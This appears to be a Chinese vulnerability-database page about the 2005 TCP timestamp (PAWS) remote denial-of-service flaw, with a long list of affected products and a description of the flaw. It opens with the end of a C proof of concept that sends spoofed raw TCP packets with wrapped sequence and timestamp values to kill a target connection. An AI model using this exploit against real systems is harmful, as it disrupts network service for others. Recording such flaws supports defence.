r = sendto(sock, packet, len, 0, (struct sockaddr *)&sin, sizeof(sin));
if (r != len) {
perror("sendto");
return (1);
}

return (0);
}

static u_int32_t
op(u_int32_t u)
{
return (u_int32_t)(((u_int64_t)u + 2147483648UL) % 4294967296ULL);
}

int main(int argc, char *argv[])
{
u_int32_t saddr, daddr, seq, ts;
u_int16_t sport, dport;
int sock, i;

if (argc != 5) {
fprintf(stderr, "usage: %s <src ip> <src port> "
"<dst ip> <dst port>\n", argv[0]);
return (1);
}

saddr = inet_addr(argv[1]);
daddr = inet_addr(argv[3]);
sport = atoi(argv[2]);
dport = atoi(argv[4]);

sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock < 0) {
perror("socket");
return (1);
}
i = 1;
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) == -1) {
perror("setsockopt");
close(sock);
return (1);
}

seq = arc4random();
ts = arc4random();
if (send_tcp(sock, saddr, daddr, sport, dport, seq, ts) ||
send_tcp(sock, saddr, daddr, sport, dport, seq, op(ts)) ||
send_tcp(sock, saddr, daddr, sport, dport, op(seq), ts) ||
send_tcp(sock, saddr, daddr, sport, dport, op(seq), op(ts))) {
fprintf(stderr, "failed\n");
close(sock);
return (1);
}

close(sock);
printf("done\n");
return (0);
}

// milw0rm.com [2005-05-21]
		

- 漏洞信息

16685
Multiple Vendor Malformed TCP Timestamp Handling Remote DoS
Denial of Service
Loss of Availability

- 漏洞描述

- 时间线

2005-05-18 Unknow
2005-05-21 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor TCP Timestamp PAWS Remote Denial Of Service Vulnerability
Design Error 13676
Yes No
2005-05-18 12:00:00 2006-05-17 11:29:00
Noritoshi Demizu is credited with the discovery of this vulnerability.

- 受影响的程序版本

Yamaha RTX2000
Yamaha RTX1500
Yamaha RTX1100
Yamaha RTX1000
Yamaha RTV700
Yamaha RT57i
Yamaha RT300i
Yamaha RT250i
Yamaha RT105
SCO Unixware 7.1.4
SCO Unixware 7.1.3
SCO Open Server 6.0
OpenBSD OpenBSD 3.6
OpenBSD OpenBSD 3.5
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
Nortel Networks WLAN Access Point 7250.0
Nortel Networks WLAN Access Point 7220.0
Nortel Networks Universal Signaling Point Compact/Lite
Nortel Networks Universal Signaling Point 5200
Nortel Networks SRG 1.0
Nortel Networks Optical Metro 5200
Nortel Networks Optical Metro 5100
Nortel Networks Optical Metro 5000
Nortel Networks Ethernet Routing Switch 1648
Nortel Networks Ethernet Routing Switch 1624
Nortel Networks Ethernet Routing Switch 1612
Nortel Networks Contact Center
Nortel Networks Communications Server 1000
Nortel Networks CallPilot 703t
Nortel Networks CallPilot 702t
Nortel Networks CallPilot 201i
Nortel Networks CallPilot 200i
Nortel Networks BCM 400
Nortel Networks BCM 200
Nortel Networks BCM 1000
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
IETF RFC 1323 : TCP Extensions for High Performance
Hitachi GS4000
Hitachi GR4000
Hitachi GR3000
Hitachi AlaxalA AX
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.2.1 -RELEASE
FreeBSD FreeBSD 5.2 -RELENG
FreeBSD FreeBSD 5.2 -RELEASE
FreeBSD FreeBSD 5.2
FreeBSD FreeBSD 5.1 -RELENG
FreeBSD FreeBSD 5.1 -RELEASE/Alpha
FreeBSD FreeBSD 5.1 -RELEASE-p5
FreeBSD FreeBSD 5.1 -RELEASE
FreeBSD FreeBSD 5.1
FreeBSD FreeBSD 5.0 -RELENG
FreeBSD FreeBSD 5.0 -RELEASE-p14
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.11 -STABLE
FreeBSD FreeBSD 4.11 -RELENG
FreeBSD FreeBSD 4.11 -RELEASE-p3
FreeBSD FreeBSD 4.10 -RELENG
FreeBSD FreeBSD 4.10 -RELEASE-p8
FreeBSD FreeBSD 4.10 -RELEASE
FreeBSD FreeBSD 4.10
FreeBSD FreeBSD 4.9 -RELENG
FreeBSD FreeBSD 4.9 -PRERELEASE
FreeBSD FreeBSD 4.9
FreeBSD FreeBSD 4.8 -RELENG
FreeBSD FreeBSD 4.8 -RELEASE-p7
FreeBSD FreeBSD 4.8 -PRERELEASE
FreeBSD FreeBSD 4.8
FreeBSD FreeBSD 4.7 -STABLE
FreeBSD FreeBSD 4.7 -RELENG
FreeBSD FreeBSD 4.7 -RELEASE-p17
FreeBSD FreeBSD 4.7 -RELEASE
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6.2
FreeBSD FreeBSD 4.6 -STABLE
FreeBSD FreeBSD 4.6 -RELENG
FreeBSD FreeBSD 4.6 -RELEASE-p20
FreeBSD FreeBSD 4.6 -RELEASE
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
FreeBSD FreeBSD 4.5 -STABLE
FreeBSD FreeBSD 4.5 -RELENG
FreeBSD FreeBSD 4.5 -RELEASE-p32
FreeBSD FreeBSD 4.5 -RELEASE
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4 -STABLE
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4 -RELEASE-p42
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3 -STABLE
FreeBSD FreeBSD 4.3 -RELENG
FreeBSD FreeBSD 4.3 -RELEASE-p38
FreeBSD FreeBSD 4.3 -RELEASE
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.2 -STABLEpre122300
FreeBSD FreeBSD 4.2 -STABLEpre050201
FreeBSD FreeBSD 4.2 -STABLE
FreeBSD FreeBSD 4.2 -RELEASE
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 4.1.1 -STABLE
FreeBSD FreeBSD 4.1.1 -RELEASE
FreeBSD FreeBSD 4.1.1
FreeBSD FreeBSD 4.1
FreeBSD FreeBSD 4.0 .x
FreeBSD FreeBSD 4.0 -RELENG
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5.1 -STABLEpre2001-07-20
FreeBSD FreeBSD 3.5.1 -STABLE
FreeBSD FreeBSD 3.5.1 -RELEASE
FreeBSD FreeBSD 3.5.1
FreeBSD FreeBSD 3.5 x
FreeBSD FreeBSD 3.5 -STABLEpre122300
FreeBSD FreeBSD 3.5 -STABLEpre050201
FreeBSD FreeBSD 3.5 -STABLE
FreeBSD FreeBSD 3.5
FreeBSD FreeBSD 3.4 x
FreeBSD FreeBSD 3.4
FreeBSD FreeBSD 3.3 x
FreeBSD FreeBSD 3.3
FreeBSD FreeBSD 3.2 x
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1 x
FreeBSD FreeBSD 3.1
FreeBSD FreeBSD 3.0 -RELENG
FreeBSD FreeBSD 3.0
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 2.2 x
FreeBSD FreeBSD 2.2
FreeBSD FreeBSD 2.1.7 .1
FreeBSD FreeBSD 2.1.6 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1 x
FreeBSD FreeBSD 2.1
FreeBSD FreeBSD 2.0.5
FreeBSD FreeBSD 2.0
FreeBSD FreeBSD 1.1.5 .1
FreeBSD FreeBSD 4.10-PRERELEASE
FreeBSD FreeBSD 3.x
FreeBSD FreeBSD 2.x
FreeBSD FreeBSD -current
F5 BigIP 9.0.5
F5 BigIP 9.0.4
F5 BigIP 9.0.3
F5 BigIP 9.0.2
F5 BigIP 9.0.1
F5 BigIP 9.0
F5 BigIP 4.6.2
F5 BigIP 4.6
F5 BigIP 4.5.12
F5 BigIP 4.5.11
F5 BigIP 4.5.10
F5 BigIP 4.5.9
F5 BigIP 4.5.6
F5 BigIP 4.5
F5 BigIP 4.4
F5 BigIP 4.3
F5 BigIP 4.2
F5 BigIP 4.0
Cisco Web Collaboration Option
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Unity Server
Cisco Support Tools
Cisco SN5400 series storage routers
Cisco SN 5428 Storage Router SN5428-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-3.3.1-K9
Cisco SN 5428 Storage Router SN5428-3.2.2-K9
Cisco SN 5428 Storage Router SN5428-3.2.1-K9
Cisco SN 5428 Storage Router SN5428-2.5.1-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.1-K9
Cisco SN 5420 Storage Router 1.1.3
Cisco SN 5420 Storage Router 1.1 (7)
Cisco SN 5420 Storage Router 1.1 (5)
Cisco SN 5420 Storage Router 1.1 (4)
Cisco SN 5420 Storage Router 1.1 (3)
Cisco SN 5420 Storage Router 1.1 (2)
Cisco Secure ACS Solution Engine 3.3.2
Cisco Secure ACS Solution Engine 3.3.1
Cisco Secure ACS Solution Engine 3.3
Cisco Secure ACS Solution Engine
Cisco Secure ACS for Windows Server 3.2
Cisco Secure ACS for Windows NT 3.1.1
Cisco Secure ACS for Windows NT 3.0.3
Cisco Secure ACS for Windows NT 3.0 .1
Cisco Secure ACS for Windows NT 3.0
Cisco Secure ACS for Windows NT 2.42
Cisco Secure ACS for Windows NT 2.6.4
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6.3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6.2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6
Cisco Secure ACS for Windows NT 2.5
Cisco Secure ACS for Windows NT 2.4
Cisco Secure ACS for Windows NT 2.3
Cisco Secure ACS for Windows NT 2.1
Cisco Secure ACS for Unix 2.3.6 .1
Cisco Secure ACS for Unix 2.3.5 .1
Cisco Secure ACS for Unix 2.3
Cisco Secure ACS for Unix 2.0
Cisco Secure Access Control Server 3.3.2
Cisco Secure Access Control Server 3.3.1
Cisco Secure Access Control Server 3.3 (1)
Cisco Secure Access Control Server 3.3
Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2.1
Cisco Secure Access Control Server 3.2 (3)
Cisco Secure Access Control Server 3.2 (2)
Cisco Secure Access Control Server 3.2 (1.20)
Cisco Secure Access Control Server 3.2 (1)
Cisco Secure Access Control Server 3.2
Cisco Secure Access Control Server 3.1
Cisco Secure Access Control Server 3.0
Cisco Secure Access Control Server
Cisco Remote Monitoring Suite Option
Cisco Personal Assistant 1.4 (2)
Cisco Personal Assistant 1.4 (1)
Cisco Personal Assistant 1.3 (4)
Cisco Personal Assistant 1.3 (3)
Cisco Personal Assistant 1.3 (2)
Cisco Personal Assistant 1.3 (1)
Cisco Personal Assistant
Cisco MGX 8250 1.2.11
Cisco MGX 8250 1.2.10
Cisco MGX 8250 1.2.10
Cisco MGX 8230 1.2.11
Cisco MGX 8230 1.2.10
Cisco MGX 8230 1.2.10
Cisco MGX
Cisco MeetingPlace
Cisco IP Contact Center Express
Cisco IP Contact Center Enterprise
Cisco Interactive Voice Response
Cisco Intelligent Contact Manager 5.0
Cisco Intelligent Contact Manager
Cisco Emergency Responder 1.1
Cisco Emergency Responder
Cisco E-Mail Manager
Cisco CSS11800 Content Services Switch
Cisco CSS11506 Content Services Switch
Cisco CSS11503 Content Services Switch
Cisco CSS11501 Content Services Switch
Cisco CSS11500 Content Services Switch 7.30 (00.09)S
Cisco CSS11500 Content Services Switch 7.30 (00.08)S
Cisco CSS11500 Content Services Switch 7.20 (03.10)S
Cisco CSS11500 Content Services Switch 7.20 (03.09)S
Cisco CSS11500 Content Services Switch 7.10 (05.07)S
Cisco CSS11500 Content Services Switch
Cisco CSS11150 Content Services Switch
Cisco CSS11050 Content Services Switch
Cisco CSS11000 Content Services Switch
Cisco Conference Connection 1.2
Cisco Conference Connection 1.1 (1)
Cisco Conference Connection
Cisco CiscoWorks Windows/WUG 0
Cisco CiscoWorks Windows 0
Cisco CiscoWorks Windows
Cisco CiscoWorks VPN/Security Management Solution
Cisco CiscoWorks LMS 1.3
Cisco CiscoWorks Common Services 2.2
Cisco CiscoWorks Common Management Foundation 2.2
Cisco CiscoWorks Common Management Foundation 2.1
Cisco CiscoWorks Common Management Foundation 2.0
Cisco CiscoWorks CD1 5th Edition
Cisco CiscoWorks CD1 4th Edition
Cisco CiscoWorks CD1 3rd Edition
Cisco CiscoWorks CD1 2nd Edition
Cisco CiscoWorks CD1 1st Edition
Cisco CiscoWorks Access Control List Manager 1.6
Cisco CiscoWorks Access Control List Manager 1.5
Cisco CiscoWorks 1105 Wireless LAN Solution Engine
Cisco CiscoWorks 1105 Hosting Solution Engine
Cisco CiscoWorks
Cisco Call Manager 4.0
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Call Manager
Cisco AP350
Cisco AP1200
Cisco Agent Desktop
Blue Coat Systems SGOS
Blue Coat Systems CacheOS
Avaya Intuity Audix R5 0
Avaya Intuity AUDIX
Avaya Interactive Response 1.3
Avaya Interactive Response 1.2.1
Avaya Interactive Response
Avaya CVLAN
ALAXALA Networks AX7800S
ALAXALA Networks AX7800R
ALAXALA Networks AX5400S
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition SP1
F5 BigIP 9.1
F5 BigIP 4.6.3
F5 BigIP 4.5.13
Cisco PIX OS
Cisco IOS XR
Cisco IOS 0
Cisco CatOS

- 不受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition SP1
F5 BigIP 9.1
F5 BigIP 4.6.3
F5 BigIP 4.5.13
Cisco PIX OS
Cisco IOS XR
Cisco IOS 0
Cisco CatOS

- 漏洞讨论

A denial-of-service vulnerability exists for the TCP RFC 1323. The issue resides in the Protection Against Wrapped Sequence Numbers (PAWS) technique that was included to increase overall TCP performance.

When TCP 'timestamps' are enabled, both hosts at the endpoints of a TCP connection employ internal clocks to mark TCP headers with a 'timestamp' value.

When TCP PAWS is configured to employ timestamp values, this functionality exposes TCP PAWS implementations to a denial-of-service vulnerability.

The issue manifests if an attacker transmits a sufficient TCP PAWS packet to a vulnerable computer. The attacker sets a large value as the packet timestamp. When the target computer processes this packet, the internal timer is updated to the large value that the attacker supplied. This causes all other valid packets that are received subsequent to an attack to be dropped, because they are deemed to be too old or invalid. This type of attack will effectively deny service for a target connection.

- 漏洞利用

A proof-of-concept exploit is provided by Daniel Hartmeier <daniel@benzedrine.cx>.

- 解决方案


Please see the referenced advisories for further information.


FreeBSD FreeBSD 4.0 alpha

FreeBSD FreeBSD 4.1.1 -STABLE

FreeBSD FreeBSD 4.11 -RELEASE-p3

FreeBSD FreeBSD 4.3 -STABLE

FreeBSD FreeBSD 4.3 -RELENG

FreeBSD FreeBSD 4.4 -RELENG

FreeBSD FreeBSD 4.4 -RELEASE-p42

FreeBSD FreeBSD 4.6 -RELEASE-p20

FreeBSD FreeBSD 4.6 -RELENG

FreeBSD FreeBSD 4.8 -PRERELEASE

FreeBSD FreeBSD 4.8

FreeBSD FreeBSD 5.1 -RELEASE/Alpha

FreeBSD FreeBSD 5.2 -RELENG

SCO Unixware 7.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站